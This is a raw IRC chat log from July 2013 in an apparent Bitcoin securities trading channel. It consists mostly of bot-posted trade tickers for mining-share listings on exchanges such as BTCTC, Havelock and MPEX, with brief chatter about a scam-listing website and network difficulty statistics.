[TAT.VIRTUALMINE] 25 @ 0.003601 = 0.09 BTC [+] Jul 21 16:35:05 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003601 = 0.09 BTC [+] Jul 21 16:39:57 [BTCTC] [TAT.ASICMINER] 5 @ 0.04555 = 0.2278 BTC [+] Jul 21 16:49:17 [BTCTC] [TAT.ASICMINER] 19 @ 0.04555 = 0.8655 BTC [+] Jul 21 16:49:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.04555 = 0.0911 BTC [+] Jul 21 16:49:27 [MPEX] [S.MPOE] 5791 @ 0.00083385 = 4.8288 BTC [-] Jul 21 16:49:28 [MPEX] [S.MPOE] 1286 @ 0.00083246 = 1.0705 BTC [-] Jul 21 16:49:45 [MPEX] [S.MPOE] 4080 @ 0.00083192 = 3.3942 BTC [-] Jul 21 16:50:01 [BTCTC] [ASICMINER-PT] 1 @ 4.735 BTC [-] Jul 21 16:51:01 [BTCTC] [ASICMINER-PT] 1 @ 4.739999 BTC [+] Jul 21 16:52:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.045673 = 0.5024 BTC [+] Jul 21 16:53:30 [BTCTC] [TAT.ASICMINER] 9 @ 0.045675 = 0.4111 BTC [+] Jul 21 16:54:17 [BTCTC] [TAT.ASICMINER] 10 @ 0.045675 = 0.4568 BTC [+] Jul 21 16:54:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.045675 BTC [+] Jul 21 16:56:04 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [-] Jul 21 16:56:06 [BTCTC] [ASICMINER-PT] 1 @ 4.699 BTC [-] Jul 21 16:59:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.045675 = 0.0914 BTC [+] Jul 21 17:00:06 [BTCTC] [COGNITIVE] 1 @ 0.819999 BTC [-] Jul 21 17:02:26 [BTCTC] [AMC-PT] 2 @ 0.002626 = 0.0053 BTC [-] Jul 21 17:04:34 [BTCTC] [AMC-PT] 10 @ 0.00261 = 0.0261 BTC [-] Jul 21 17:04:36 [BTCTC] [AMC-PT] 300 @ 0.002592 = 0.7776 BTC [-] Jul 21 17:04:37 [BTCTC] [AMC-PT] 423 @ 0.002591 = 1.096 BTC [-] Jul 21 17:04:39 [BTCTC] [AMC-PT] 432 @ 0.002591 = 1.1193 BTC [-] Jul 21 17:04:40 [BTCTC] [AMC-PT] 10 @ 0.002589 = 0.0259 BTC [-] Jul 21 17:04:42 [BTCTC] [AMC-PT] 100 @ 0.002571 = 0.2571 BTC [-] Jul 21 17:04:43 [BTCTC] [AMC-PT] 200 @ 0.00257 = 0.514 BTC [-] Jul 21 17:04:44 [BTCTC] [AMC-PT] 300 @ 0.00255 = 0.765 BTC [-] Jul 21 17:04:46 [BTCTC] [AMC-PT] 125 @ 0.002542 = 0.3178 BTC [-] Jul 21 17:04:47 [BTCTC] [AMC-PT] 100 @ 0.002541 = 0.2541 BTC [-] Jul 21 17:04:48 [BTCTC] [AMC-PT] 100 @ 0.00254 = 0.254 BTC [-] Jul 21 17:04:49 [BTCTC] [AMC-PT] 250 @ 0.002535 = 0.6338 BTC [-] Jul 21 17:04:51 [BTCTC] [AMC-PT] 220 @ 0.00252 = 0.5544 BTC [-] Jul 21 17:04:52 [BTCTC] [AMC-PT] 60 @ 0.00252 = 0.1512 BTC [-] Jul 21 17:04:53 [BTCTC] [AMC-PT] 50 @ 0.002514 = 0.1257 BTC [-] Jul 21 17:04:54 [BTCTC] [AMC-PT] 1 @ 0.002514 BTC [-] Jul 21 17:04:56 [BTCTC] [AMC-PT] 1500 @ 0.002514 = 3.771 BTC [-] Jul 21 17:04:57 [BTCTC] [AMC-PT] 485 @ 0.002513 = 1.2188 BTC [-] Jul 21 17:05:02 [BTCTC] [AMC-PT] 1 @ 0.002513 BTC [-] Jul 21 17:05:04 [BTCTC] [AMC-PT] 5000 @ 0.002512 = 12.56 BTC [-] Jul 21 17:05:06 [BTCTC] [AMC-PT] 10165 @ 0.00251 = 25.5142 BTC [-] Jul 21 17:05:07 [BTCTC] [AMC-PT] 925 @ 0.00251 = 2.3218 BTC [-] Jul 21 17:05:08 [BTCTC] [AMC-PT] 608 @ 0.002508 = 1.5249 BTC [-] Jul 21 17:05:09 [BTCTC] [AMC-PT] 3000 @ 0.002508 = 7.524 BTC [-] Jul 21 17:05:25 [BTCTC] [AMC-PT] 633 @ 0.002506 = 1.5863 BTC [-] Jul 21 17:20:01 [BTCTC] [TAT.ASICMINER] 9 @ 0.045529 = 0.4098 BTC [-] Jul 21 17:20:03 [BTCTC] [TAT.ASICMINER] 47 @ 0.045046 = 2.1172 BTC [-] Jul 21 17:20:05 [BTCTC] [TAT.ASICMINER] 47 @ 0.045046 = 2.1172 BTC [-] Jul 21 17:20:07 [BTCTC] [TAT.ASICMINER] 45 @ 0.045045 = 2.027 BTC [-] Jul 21 17:20:09 [BTCTC] [TAT.ASICMINER] 50 @ 0.045043 = 2.2522 BTC [-] Jul 21 17:20:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.045006 = 0.09 BTC [-] Jul 21 17:20:36 [HAVELOCK] [AM100] 97 @ 0.043896 = 4.2579 BTC [+] Jul 21 17:20:38 [HAVELOCK] [AM100] 103 @ 0.04389699 = 4.5214 BTC [+] Jul 21 17:23:49 [HAVELOCK] [SMG] 1 @ 0.00028768 BTC [-] Jul 21 17:27:44 [BTCTC] [B.YABMC] 1 @ 0.002401 BTC [-] Jul 21 17:27:50 [BTCTC] [B.YABMC] 24 @ 0.0024 = 0.0576 BTC [-] Jul 21 17:30:19 [BTCTC] [BASIC-MINING] 1 @ 0.684001 BTC [-] Jul 21 17:32:01 [HAVELOCK] [SDSTM] 5 @ 0.0119 = 0.0595 BTC [-] Jul 21 17:32:18 [BTCTC] [S.MPOE-PT] 13 @ 0.000945 = 0.0123 BTC [+] Jul 21 17:32:55 [HAVELOCK] [SDSTM] 5 @ 0.0119 = 0.0595 BTC [-] Jul 21 17:36:52 [BTCTC] [ASICMINER-PT] 3 @ 4.733999 = 14.202 BTC [+] Jul 21 17:37:41 [BTCTC] [ASICMINER-PT] 1 @ 4.734 BTC [+] Jul 21 17:42:30 [BTCTC] [LTC-ATF.B2] 150 @ 0.01 = 1.5 BTC [+] Jul 21 17:47:28 [HAVELOCK] [AM1] 1 @ 4.65 BTC [+] Jul 21 17:49:50 [HAVELOCK] [VTX] 1 @ 0.59 BTC [+] Jul 21 17:49:59 [BTCTC] [BASIC-MINING] 7 @ 0.684001 = 4.788 BTC [-] Jul 21 17:50:01 [BTCTC] [BASIC-MINING] 15 @ 0.684 = 10.26 BTC [-] Jul 21 17:50:03 [BTCTC] [BASIC-MINING] 1 @ 0.682 BTC [-] Jul 21 17:50:04 [BTCTC] [BASIC-MINING] 1 @ 0.68 BTC [-] Jul 21 17:50:07 [HAVELOCK] [VTX] 2 @ 0.5949 = 1.1898 BTC [+] Jul 21 17:51:55 [HAVELOCK] [SDSTM] 1 @ 0.012 BTC [+] **** BEGIN LOGGING AT Sun Jul 21 23:02:58 2013 Jul 21 23:04:42 [HAVELOCK] [AM1] 2 @ 4.6 = 9.2 BTC [-] Jul 21 23:04:42 [HAVELOCK] [AM100] 33 @ 0.042702 = 1.4092 BTC [-] Jul 21 23:06:25 [BTCTC] [ASICMINER-PT] 1 @ 4.732201 BTC [+] Jul 21 23:06:25 [BTCTC] [ASICMINER-PT] 4 @ 4.7322 = 18.9288 BTC [-] Jul 21 23:06:26 [BTCTC] [ASICMINER-PT] 1 @ 4.7321 BTC [-] Jul 21 23:07:08 [BTCTC] [ASICMINER-PT] 1 @ 4.721001 BTC [-] Jul 21 23:07:18 [BTCTC] [ASICMINER-PT] 1 @ 4.721 BTC [-] Jul 21 23:07:30 [BTCTC] [ASICMINER-PT] 1 @ 4.72 BTC [-] Jul 21 23:07:34 [BTCTC] [ASICMINER-PT] 1 @ 4.71012 BTC [-] Jul 21 23:07:36 [HAVELOCK] [HIM] 2 @ 0.2799998 = 0.56 BTC [+] Jul 21 23:17:44 [BTCTC] [AMC-PT] 50 @ 0.0027 = 0.135 BTC [-] Jul 21 23:17:46 [BTCTC] [AMC-PT] 75 @ 0.00271 = 0.2033 BTC [+] Jul 21 23:17:46 [BTCTC] [AMC-PT] 1004 @ 0.00271 = 2.7208 BTC [+] Jul 21 23:18:37 http://bitcoinscammers.com/ Jul 21 23:18:41 Bitcoin Scammers & (Other Cryptocurrency Scammers) Jul 21 23:18:53 [BTCTC] [AMC-PT] 100 @ 0.002711 = 0.2711 BTC [+] Jul 21 23:18:55 [BTCTC] [AMC-PT] 465 @ 0.002712 = 1.2611 BTC [+] Jul 21 23:23:40 Hmm wonder if there is anyone from this chat room on that site. Jul 21 23:29:01 [HAVELOCK] [SDSTM] 106 @ 0.012 = 1.272 BTC [+] Jul 21 23:29:03 [HAVELOCK] [SDSTM] 19 @ 0.012 = 0.228 BTC [+] Jul 21 23:33:02 [MPEX] [S.MPOE] 1884 @ 0.00082978 = 1.5633 BTC [-] Jul 21 23:33:03 [MPEX] [S.MPOE] 1700 @ 0.0008289 = 1.4091 BTC [-] Jul 21 23:33:04 [MPEX] [S.MPOE] 916 @ 0.00082864 = 0.759 BTC [-] Jul 21 23:37:14 [HAVELOCK] [AM100] 11 @ 0.042791 = 0.4707 BTC [+] Jul 21 23:37:20 [HAVELOCK] [AM100] 19 @ 0.042791 = 0.813 BTC [+] Jul 21 23:37:28 [HAVELOCK] [AM100] 82 @ 0.04279 = 3.5088 BTC [-] Jul 21 23:44:57 "If you are a member of coinchat, you are forced to use this wallet system to withdraw funds …. which has a lot in common with a money-laundering operation" Jul 21 23:45:54 [BTCTC] [AMC-PT] 2 @ 0.002712 = 0.0054 BTC [+] Jul 21 23:45:54 [BTCTC] [TAT.ASICMINER] 45 @ 0.045521 = 2.0484 BTC [-] Jul 21 23:45:54 [BTCTC] [BASIC-MINING] 1 @ 0.675001 BTC [-] Jul 21 23:45:55 "unscrupulous practices towards newbies" Jul 21 23:45:55 it's bitcoinbutthurt.com Jul 21 23:47:43 [MPEX] [S.MPOE] 5634 @ 0.00082864 = 4.6686 BTC [-] Jul 21 23:47:45 [MPEX] [S.MPOE] 1113 @ 0.00082829 = 0.9219 BTC [-] Jul 21 23:53:13 pankkake wait wut ?!@ Jul 21 23:53:19 [HAVELOCK] [AM1] 1 @ 4.6 BTC [-] Jul 21 23:53:39 on http://bitcoinscammers.com/inputs-io/ Jul 21 23:53:45 i see justdice Jul 21 23:53:54 o look bitbet too Jul 21 23:54:02 you have to enable javascript to have more Jul 21 23:54:24 or click load more, nevermind Jul 21 23:55:29 lol some noob put in 0.02 "just for fun" Jul 21 23:55:35 late on a bet Jul 21 23:55:43 and didn't quite turn a profit. CLEARLY ITS A SCAM Jul 21 23:56:51 [BTCTC] [ASICMINER-PT] 4 @ 4.685 = 18.74 BTC [-] Jul 21 23:56:53 [BTCTC] [ASICMINER-PT] 1 @ 4.681 BTC [-] Jul 21 23:56:54 [BTCTC] [ASICMINER-PT] 1 @ 4.66 BTC [-] Jul 21 23:56:56 [BTCTC] [ASICMINER-PT] 4 @ 4.631025 = 18.5241 BTC [-] Jul 22 00:02:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.045033 = 0.9007 BTC [-] Jul 22 00:04:16 [MPEX] [S.MPOE] 3735 @ 0.00082788 = 3.0921 BTC [-] Jul 22 00:04:44 [BTCTC] [AMC-PT] 2 @ 0.002711 = 0.0054 BTC [-] Jul 22 00:06:14 [BTCTC] [LTC-ATF.B2] 1 @ 0.01 BTC [+] Jul 22 00:08:17 [BTCTC] [COGNITIVE] 1 @ 0.819976 BTC [-] Jul 22 00:08:45 [HAVELOCK] [AM100] 14 @ 0.042702 = 0.5978 BTC [-] Jul 22 00:08:51 [HAVELOCK] [AM100] 1 @ 0.0427012 BTC [-] Jul 22 00:08:55 [HAVELOCK] [AM100] 1 @ 0.0427 BTC [-] Jul 22 00:09:00 [HAVELOCK] [AM100] 20 @ 0.042691 = 0.8538 BTC [-] Jul 22 00:09:05 [HAVELOCK] [AM100] 25 @ 0.04269001 = 1.0673 BTC [-] Jul 22 00:09:09 [HAVELOCK] [AM100] 2 @ 0.04269 = 0.0854 BTC [-] Jul 22 00:09:15 [HAVELOCK] [AM100] 300 @ 0.04269 = 12.807 BTC [-] Jul 22 00:17:05 [BTCTC] [AMC-PT] 4 @ 0.002711 = 0.0108 BTC [-] Jul 22 00:18:19 [BTCTC] [AMC-PT] 492 @ 0.002711 = 1.3338 BTC [-] Jul 22 00:19:47 [BTCTC] [AMC-PT] 198 @ 0.002712 = 0.537 BTC [+] Jul 22 00:20:47 [BTCTC] [AMC-PT] 275 @ 0.002711 = 0.7455 BTC [-] Jul 22 00:20:49 [BTCTC] [AMC-PT] 575 @ 0.002713 = 1.56 BTC [+] Jul 22 00:22:36 [BTCTC] [TAT.ASICMINER] 16 @ 0.045033 = 0.7205 BTC [-] Jul 22 00:22:41 [BTCTC] [TAT.ASICMINER] 9 @ 0.045032 = 0.4053 BTC [-] Jul 22 00:22:47 [BTCTC] [TAT.ASICMINER] 45 @ 0.04503 = 2.0264 BTC [-] Jul 22 00:22:49 [HAVELOCK] [AM100] 20 @ 0.043594 = 0.8719 BTC [+] Jul 22 00:22:51 [HAVELOCK] [AM100] 50 @ 0.0435949 = 2.1797 BTC [+] Jul 22 00:22:53 [BTCTC] [TAT.ASICMINER] 9 @ 0.04502 = 0.4052 BTC [-] Jul 22 00:22:54 [HAVELOCK] [AM100] 50 @ 0.04359888 = 2.1799 BTC [+] Jul 22 00:22:57 [BTCTC] [TAT.ASICMINER] 41 @ 0.04502 = 1.8458 BTC [-] Jul 22 00:22:59 [BTCTC] [TAT.ASICMINER] 7 @ 0.045512 = 0.3186 BTC [+] Jul 22 00:37:55 ;;bcstats Jul 22 00:37:57 Current Blocks: 247815 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 152 blocks | Next Difficulty In About: 18 hours, 19 minutes, and 53 seconds | Next Difficulty Estimate: 31116311.0389 | Estimated Percent Change: 18.93307 Jul 22 00:38:39 [HAVELOCK] [AM100] 8 @ 0.042801 = 0.3424 BTC [-] Jul 22 00:38:42 [HAVELOCK] [AM100] 7 @ 0.042801 = 0.2996 BTC [-] Jul 22 00:39:06 [HAVELOCK] [AM100] 150 @ 0.0428001 = 6.42 BTC [-] Jul 22 00:39:33 [BTCTC] [TAT.ASICMINER] 27 @ 0.045023 = 1.2156 BTC [-] Jul 22 00:39:35 [BTCTC] [TAT.ASICMINER] 20 @ 0.045022 = 0.9004 BTC [-] Jul 22 00:39:37 [BTCTC] [TAT.ASICMINER] 79 @ 0.04502 = 3.5566 BTC [-] Jul 22 00:39:40 [BTCTC] [TAT.ASICMINER] 20 @ 0.045019 = 0.9004 BTC [-] Jul 22 00:39:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.045005 = 0.18 BTC [-] Jul 22 00:40:00 [HAVELOCK] [AM100] 111 @ 0.0428001 = 4.7508 BTC [-] Jul 22 00:40:05 yay Havelock! Jul 22 00:40:05 [HAVELOCK] [AM100] 15 @ 0.0428001 = 0.642 BTC [-] Jul 22 00:40:33 [BTCTC] [TAT.ASICMINER] 26 @ 0.045005 = 1.1701 BTC [-] Jul 22 00:40:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [-] Jul 22 00:40:36 [BTCTC] [TAT.ASICMINER] 82 @ 0.045 = 3.69 BTC [-] Jul 22 00:42:51 [HAVELOCK] [AM100] 5 @ 0.0428001 = 0.214 BTC [-] Jul 22 00:45:08 [HAVELOCK] [AM100] 4 @ 0.04280001 = 0.1712 BTC [-] Jul 22 00:53:20 [MPEX] [S.MPOE] 3900 @ 0.00082991 = 3.2366 BTC [+] Jul 22 00:53:58 [BTCTC] [S.BBET-PT] 5 @ 0.002019 = 0.0101 BTC [+] Jul 22 00:54:17 [HAVELOCK] [AM100] 5 @ 0.04399 = 0.22 BTC [+] Jul 22 00:54:32 [HAVELOCK] [AM100] 5 @ 0.0445 = 0.2225 BTC [+] Jul 22 00:54:39 [HAVELOCK] [AM100] 10 @ 0.0445 = 0.445 BTC [+] Jul 22 00:54:46 [HAVELOCK] [AM100] 1 @ 0.04496988 BTC [+] Jul 22 00:57:11 [BTCTC] [DMS.PURCHASE] 312 @ 0.039477 = 12.3168 BTC [-] Jul 22 00:58:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.045502 = 0.546 BTC [+] Jul 22 01:09:42 [HAVELOCK] [AM100] 50 @ 0.04496799 = 2.2484 BTC [-] Jul 22 01:09:44 [HAVELOCK] [AM100] 112 @ 0.044968 = 5.0364 BTC [+] Jul 22 01:10:10 [HAVELOCK] [AM100] 50 @ 0.044968 = 2.2484 BTC [+] Jul 22 01:10:18 [HAVELOCK] [AM100] 75 @ 0.044968 = 3.3726 BTC [+] Jul 22 01:10:18 [HAVELOCK] [AM100] 37 @ 0.044969 = 1.6639 BTC [+] Jul 22 01:10:26 http://imgur.com/T4maZzI Jul 22 01:10:28 Bitcoin transaction volume as % of market cap - Imgur Jul 22 01:11:35 seconds since unix epoch Jul 22 01:11:42 worst time axis for a graph Jul 22 01:14:19 bitcoin tx volume is notoriously meaningless. Jul 22 01:14:26 [BTCTC] [BTC-BOND] 1 @ 0.009996 BTC [+] Jul 22 01:15:34 .bait Jul 22 01:15:50 ozbot still ignoring me :/ Jul 22 01:17:52 haha Jul 22 01:20:06 [HAVELOCK] [AM100] 66 @ 0.042811 = 2.8255 BTC [-] Jul 22 01:20:15 [HAVELOCK] [AM100] 14 @ 0.04281 = 0.5993 BTC [-] Jul 22 01:27:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003603 = 0.036 BTC [-] Jul 22 01:28:03 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.003602 = 0.0504 BTC [-] Jul 22 01:29:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.045398 = 0.1816 BTC [-] Jul 22 01:33:58 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003331 = 0.0333 BTC [-] Jul 22 01:34:00 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00333 = 0.1665 BTC [-] Jul 22 01:34:02 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00332 = 0.0199 BTC [-] Jul 22 01:34:04 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.003311 = 0.0993 BTC [-] Jul 22 01:34:21 [BTCTC] [TAT.VIRTUALMINE] 924 @ 0.0033 = 3.0492 BTC [-] Jul 22 01:34:23 [BTCTC] [TAT.VIRTUALMINE] 303 @ 0.00311 = 0.9423 BTC [-] Jul 22 01:34:25 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00311 = 0.0311 BTC [-] Jul 22 01:34:25 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00311 = 0.028 BTC [-] Jul 22 01:34:36 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.00311 = 0.028 BTC [-] Jul 22 01:34:37 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00311 = 0.0311 BTC [-] Jul 22 01:34:39 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.0031 = 0.372 BTC [-] Jul 22 01:34:41 [BTCTC] [TAT.VIRTUALMINE] 870 @ 0.00305 = 2.6535 BTC [-] Jul 22 01:35:41 [HAVELOCK] [SMG] 25 @ 0.00028998 = 0.0072 BTC [-] Jul 22 01:35:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.045395 BTC [-] Jul 22 01:36:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.045 = 0.135 BTC [-] Jul 22 01:37:07 [BTCTC] [TAT.ASICMINER] 15 @ 0.044901 = 0.6735 BTC [-] Jul 22 01:37:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.0449 = 0.1347 BTC [-] Jul 22 01:37:11 [BTCTC] [TAT.ASICMINER] 21 @ 0.0449 = 0.9429 BTC [-] Jul 22 01:37:27 [HAVELOCK] [AM100] 1 @ 0.0445 BTC [+] Jul 22 01:38:17 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003374 = 0.0337 BTC [+] Jul 22 01:38:20 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.003374 = 0.3037 BTC [+] Jul 22 01:38:21 [BTCTC] [TAT.ASICMINER] 9 @ 0.0449 = 0.4041 BTC [-] Jul 22 01:38:23 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003375 = 0.0338 BTC [+] Jul 22 01:38:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003376 BTC [+] Jul 22 01:38:26 [BTCTC] [TAT.VIRTUALMINE] 399 @ 0.003653 = 1.4575 BTC [+] Jul 22 01:38:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.0449 = 0.4939 BTC [-] Jul 22 01:39:07 [BTCTC] [DMS.SELLING] 20 @ 0.024489 = 0.4898 BTC [+] Jul 22 01:39:37 [BTCTC] [TAT.ASICMINER] 9 @ 0.0449 = 0.4041 BTC [-] Jul 22 01:41:47 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:42:16 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:42:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:43:05 [MPEX] [S.MPOE] 3165 @ 0.00083204 = 2.6334 BTC [+] Jul 22 01:43:06 [MPEX] [S.MPOE] 1735 @ 0.0008306 = 1.4411 BTC [-] Jul 22 01:43:26 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:43:54 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:44:51 [BTCTC] [TAT.VIRTUALMINE] 750 @ 0.003499 = 2.6243 BTC [-] Jul 22 01:45:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [+] Jul 22 01:45:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003501 = 0.035 BTC [+] Jul 22 01:45:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:47:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.045388 = 0.1362 BTC [+] Jul 22 01:48:05 [BTCTC] [AMC-PT] 15 @ 0.00271 = 0.0407 BTC [-] Jul 22 01:49:58 [BTCTC] [DMS.SELLING] 1 @ 0.024489 BTC [+] Jul 22 01:50:47 [BTCTC] [DMS.MINING] 1 @ 0.015203 BTC [-] Jul 22 01:50:48 [BTCTC] [DMS.MINING] 1 @ 0.015203 BTC [-] Jul 22 01:50:51 [BTCTC] [DMS.MINING] 23 @ 0.015202 = 0.3496 BTC [-] Jul 22 01:50:52 [BTCTC] [DMS.MINING] 4 @ 0.015201 = 0.0608 BTC [-] Jul 22 01:50:55 [BTCTC] [DMS.MINING] 58 @ 0.015093 = 0.8754 BTC [-] Jul 22 01:50:56 [BTCTC] [DMS.MINING] 25 @ 0.015001 = 0.375 BTC [-] Jul 22 01:50:57 [BTCTC] [AMC-PT] 6 @ 0.00271 = 0.0163 BTC [-] Jul 22 01:55:01 [BTCTC] [DMS.MINING] 8 @ 0.015 = 0.12 BTC [-] Jul 22 01:55:03 [BTCTC] [DMS.MINING] 1 @ 0.015 BTC [-] Jul 22 01:55:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003201 BTC [-] Jul 22 01:55:57 [HAVELOCK] [AM100] 1 @ 0.0445 BTC [+] Jul 22 01:55:57 [HAVELOCK] [AM100] 50 @ 0.04494888 = 2.2474 BTC [+] Jul 22 01:55:59 [HAVELOCK] [AM100] 171 @ 0.04496999 = 7.6899 BTC [+] Jul 22 01:56:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003651 = 0.0365 BTC [+] Jul 22 01:56:21 [BTCTC] [TAT.VIRTUALMINE] 467 @ 0.003652 = 1.7055 BTC [+] Jul 22 01:56:47 [BTCTC] [BITVPS] 1 @ 0.002089 BTC [+] Jul 22 01:56:50 [MPEX] [S.MPOE] 5015 @ 0.0008306 = 4.1655 BTC [-] Jul 22 01:56:55 [MPEX] [S.MPOE] 435 @ 0.00082991 = 0.361 BTC [-] Jul 22 01:58:19 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:58:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [-] Jul 22 01:59:02 [MPEX] [S.MPOE] 1130 @ 0.00082991 = 0.9378 BTC [-] Jul 22 01:59:04 [MPEX] [S.MPOE] 1250 @ 0.00082708 = 1.0339 BTC [-] Jul 22 01:59:05 [MPEX] [S.MPOE] 120 @ 0.00082708 = 0.0992 BTC [-] Jul 22 01:59:28 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003497 = 0.035 BTC [-] Jul 22 01:59:30 [BTCTC] [TAT.VIRTUALMINE] 128 @ 0.003498 = 0.4477 BTC [+] Jul 22 01:59:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003499 = 0.035 BTC [+] Jul 22 02:00:47 [HAVELOCK] [AM100] 1 @ 0.044968 BTC [-] Jul 22 02:01:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.044255 = 0.8851 BTC [-] Jul 22 02:01:31 [BTCTC] [TAT.ASICMINER] 35 @ 0.044254 = 1.5489 BTC [-] Jul 22 02:02:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003497 = 0.035 BTC [-] Jul 22 02:02:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003498 BTC [+] Jul 22 02:03:00 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003499 = 0.014 BTC [+] Jul 22 02:03:05 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003498 = 0.035 BTC [-] Jul 22 02:03:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003499 BTC [+] Jul 22 02:03:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0035 BTC [+] Jul 22 02:03:12 [BTCTC] [TAT.VIRTUALMINE] 283 @ 0.003652 = 1.0335 BTC [+] Jul 22 02:03:14 [BTCTC] [TAT.VIRTUALMINE] 104 @ 0.003653 = 0.3799 BTC [+] Jul 22 02:03:20 [BTCTC] [TAT.VIRTUALMINE] 101 @ 0.003654 = 0.3691 BTC [+] Jul 22 02:05:42 [BTCTC] [ASICMINER-PT] 3 @ 4.631165 = 13.8935 BTC [+] Jul 22 02:05:42 [BTCTC] [ASICMINER-PT] 1 @ 4.631161 BTC [-] Jul 22 02:05:46 [BTCTC] [TAT.ASICMINER] 12 @ 0.044254 = 0.531 BTC [-] Jul 22 02:05:48 [BTCTC] [TAT.ASICMINER] 25 @ 0.04425 = 1.1063 BTC [-] Jul 22 02:05:50 [BTCTC] [TAT.ASICMINER] 25 @ 0.04425 = 1.1063 BTC [-] Jul 22 02:05:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.044003 = 0.176 BTC [-] Jul 22 02:05:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.044 = 0.176 BTC [-] Jul 22 02:05:56 [BTCTC] [TAT.ASICMINER] 28 @ 0.044 = 1.232 BTC [-] Jul 22 02:05:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 22 02:06:43 [HAVELOCK] [AM1] 2 @ 4.7 = 9.4 BTC [+] Jul 22 02:06:52 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003203 = 0.032 BTC [-] Jul 22 02:06:54 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003202 = 0.3202 BTC [-] Jul 22 02:06:56 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0032 BTC [-] Jul 22 02:06:57 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003004 = 0.015 BTC [-] Jul 22 02:07:09 [BTCTC] [DMS.MINING] 112 @ 0.01525 = 1.708 BTC [+] Jul 22 02:07:11 [BTCTC] [DMS.MINING] 200 @ 0.01525 = 3.05 BTC [+] Jul 22 02:07:12 [BTCTC] [DMS.MINING] 25 @ 0.015499 = 0.3875 BTC [+] Jul 22 02:07:14 [BTCTC] [DMS.MINING] 1 @ 0.0159 BTC [+] Jul 22 02:07:15 [BTCTC] [DMS.MINING] 69 @ 0.015979 = 1.1026 BTC [+] Jul 22 02:07:16 [BTCTC] [DMS.MINING] 30 @ 0.01598 = 0.4794 BTC [+] Jul 22 02:07:17 [BTCTC] [DMS.MINING] 46 @ 0.015984 = 0.7353 BTC [+] Jul 22 02:07:18 [BTCTC] [DMS.MINING] 40 @ 0.015984 = 0.6394 BTC [+] Jul 22 02:07:19 [BTCTC] [DMS.MINING] 50 @ 0.015984 = 0.7992 BTC [+] Jul 22 02:07:20 [BTCTC] [DMS.MINING] 100 @ 0.015996 = 1.5996 BTC [+] Jul 22 02:07:21 [BTCTC] [DMS.MINING] 187 @ 0.01624 = 3.0369 BTC [+] Jul 22 02:07:23 [BTCTC] [DMS.MINING] 10 @ 0.016242 = 0.1624 BTC [+] Jul 22 02:07:24 [BTCTC] [DMS.MINING] 20 @ 0.016242 = 0.3248 BTC [+] Jul 22 02:07:25 [BTCTC] [DMS.MINING] 20 @ 0.016243 = 0.3249 BTC [+] Jul 22 02:07:26 [BTCTC] [DMS.MINING] 50 @ 0.016247 = 0.8124 BTC [+] Jul 22 02:07:27 [BTCTC] [DMS.MINING] 50 @ 0.016248 = 0.8124 BTC [+] Jul 22 02:07:28 [BTCTC] [DMS.MINING] 62 @ 0.016249 = 1.0074 BTC [+] 